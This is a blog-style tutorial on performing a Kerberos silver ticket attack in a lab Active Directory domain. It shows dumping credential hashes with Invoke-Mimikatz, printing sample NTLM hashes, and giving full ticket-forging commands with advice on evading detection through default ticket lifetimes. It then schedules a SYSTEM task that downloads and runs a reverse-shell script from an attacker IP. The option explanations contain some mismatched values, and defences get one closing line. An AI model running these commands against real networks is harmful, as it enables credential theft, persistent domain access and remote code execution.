So Silver ticket attack is one of the ways to gain domain persistence. Once you have gained domain admin or you could dump hashes of a service account some how. To understand this attack please make sure you have a good understanding of Kerberos and its process. You can read my detailed explanation here. If you have recalled how Kerberos works let’s see where this attack fits in the cycle.
On the last step of the process when the client sends a TGS to the service that is where we can send a forged TGS and get access directly to the service and get a service ticket using this meathod.
Silver ticket abuses the part of Kerberos authentication where a client sends a Valid TGS to get a service ticket. So if an attacker knows the hash of the service account he can forge a fake service ticket with it. Kerberos will trust it since it can be decrypted by the service as its signed by the NTLM hash of the service.
downside of this attack is at unlike golden ticket which gives us access to everything. A silver ticket will only allow us access to a particular service or all the services that are running with the same service account.
Another disadvantage of this attack is if the service account is a machine account or a user account. If the password of the account changes this attack will fail. Since we wont have the correct hash of the user/machine account usually it changes within 30 days for machines. We would generally target these services when it comes to performing a silver ticket attack. CIFS (file system), HOST ( can schedule tasks ), RPCSS Host (runs wmi), WSman/http (ps remoting) all of these use the machine account as there service account.
Silver ticket attack in action
You just need to get a service account hash or in this case a machine account hash to forge a ticket. To get the hashes i will load mimikatz on a system and use this command to get the hashes. This is explained in details on the golden ticket post. In short we loaded mimikatz on the admin session and used the lsadump module to dump all the hashes on the system.
PS C:\tools> PS C:\tools> $sess = New-PSSession -ComputerName batcaveDC.batcorp.local -Credential batcorp\administrator PS C:\tools> Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1 PS C:\tools> Enter-PSSession -Session $sess [batcaveDC.batcorp.local]: PS C:\Users\Administrator\Documents> Invoke-Mimikatz Session : Interactive from 1 User Name : Administrator Domain : BATCORP Logon Server : BATCAVEDC Logon Time : 5/20/2021 5:02:37 PM SID : S-1-5-21-4103622466-1261756931-1194169491-500 msv :  Primary * Username : Administrator * Domain : BATCORP * NTLM : b8afebe1be25599be6a92060984bc353 * SHA1 : e95b0beb31e9c7abd85fa47375d03a2c6ccc626d * DPAPI : 3a55602c4035b8bec2aa1e8fecef7b39 tspkg :
Now that we have dumped the hashes we will get the machine accounts hash which in this case should be BatcorpDC.
Now that we have the hashes lets inject them in-memory and start forging a fake TGS.
Generating a silver ticket
Invoke-Mimikatz -Command '"kerberos::golden /domain:batcorp.local /sid:S-1-5-21-4103622466-1261756931-1194169491 /target:batcaveDC.batcorp.local /service:HOST /rc4:b8afebe1be25599be6a92060984bc353 /user:Administrator /ptt"' and Invoke-Mimikatz -Command '"kerberos::golden /domain:batcorp.local /sid:S-1-5-21-4103622466-1261756931-1194169491 /target:batcaveDC.batcorp.local /service:cifs /rc4:b8afebe1be25599be6a92060984bc353 /user:Administrator /ptt"'
The command to generate a silver ticket with mimikatz for two services CIFS and HOST lets take a deeper look at all its options.
Invoke-mimikatz – this is the powershell function we get after loading Invoke-mimikatz.ps1 in the session and -Command is to specify a command.
kerberos::golden – is the module name in mimikatz to generate silver tickets.
/User:Administrator – /User is to specify a user name and id in the TGT.
/service:CIFS – service name for which we want to generate a ticket
/rc4:ccd5fd44eb1c347ae4e587f5f1aabf7c – to specify a ntlm hash of the machine account or service account.
/domain:batcorp.local – is to specify the FQDN or the domain name.
– is to specify the FQDN or the domain name.
/sid:S-1-5-21-1874506631-3219952063-538504511 – is to specify the domain sid.
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 – is to specify the krbtgt hash we can use /aes128 and /aes256 to specify symmetric keys.
id:500 /groups:512 – these are to specify user id and group but this is optional
/startoffset:0 – this is optional parameter but 0 minutes means the ticket will be available right now. We can use negative to specify time in the past and a higher number to specify something in the future.
/endin:600 – this option will specify the lifetime of the ticket mimikatz by default sets it to 10 years which can be easily detected so use 600 minutes which is AD Default.
/renewmax:10080 – ticket renewal time by default in mimikatz is again 10 years but we will set it to 10080 which is 7 days and its AD Default.
/ptt – this option stands for pass the ticket it will load the ticket in memory. If we want to extract ticket on disk we can use /ticket option instead.
Now if we run the command above we get silver ticket that is created and stored in our current session for CIFS and HOST.
If we run klist we have the tickets.
Proof of concept
Now if we try to access the file system on batcaveDC.batcorp.local machine. We can do it because we already have the tickets to authenticate us.
List of SPNs can be found here :- https://adsecurity.org/?page_id=183
Exploiting Host Service with silver tickets
As you saw above we requested a silver ticket for the host service. It allows users to create scheduled tasks on the target system we can exploit it to get code execution on the system.
This command will create a task to pull a reverse shell from our system and schedule task. When the task runs we will get a shell as system.
schtasks /create /S batcaveDC.batcorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.254.3/Invoke-PowerShellTcp.ps1'')'"
Our task was successfully created now we will open a powercat listener and then we will trigger the task we just made.
To tigger the task we will use schtask with following arguments.
schtasks /Run /S batcaveDC.batcorp.local /TN "STCheck"
and we get a shell as system.
Enabling PAC check will defend this attack but it is not enabled by default on windows. Another way is to frequently change machine account passwords.